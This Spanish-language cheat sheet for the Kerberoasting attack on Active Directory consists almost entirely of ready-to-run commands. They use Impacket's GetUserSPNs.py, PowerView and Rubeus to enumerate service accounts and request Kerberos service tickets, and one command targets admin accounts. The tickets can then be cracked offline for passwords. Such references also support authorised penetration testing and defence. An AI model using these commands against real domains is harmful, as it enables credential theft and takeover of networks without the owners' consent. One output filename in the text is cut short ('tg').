# Kerberoast

## Linux/Unix

### Impacket

Obtener cuentas Service Principal Names (SPN) del dominio objetivo.

```shell
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user>
```

Obtener Ticket Granting Service (TGS) del dominio objetivo.

```shell
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request -outputfile tgs.txt
```

Obtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.

```shell
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN>
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN> -outputfile tg
```

## Windows

### PowerView

Obtener cuentas Service Principal Names (SPN) del dominio objetivo.

```powershell
Get-DomainUser -SPN -Domain <ACME.LOCAL> | select SamAccountName
```

Enumeración de grupos a los cuales pertence la cuenta Service Principal Names (SPN) en el dominio objetivo.

```powershell
Get-DomainUser -Domain <ACME.LOCAL> -Identity <user-SPN> | select SamAccountName, MemberOf
```

### Rubeus

Obtener estadísticas de usuarios del dominio objetivo.

```shell
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /stats
```

Obtener Ticket Granting Service (TGS) del dominio objetivo.

```shell
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /nowrap
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /ldapfilter:'admincount=1' /nowrap
```

Obtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.

```shell
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /user:<user> /nowrap
```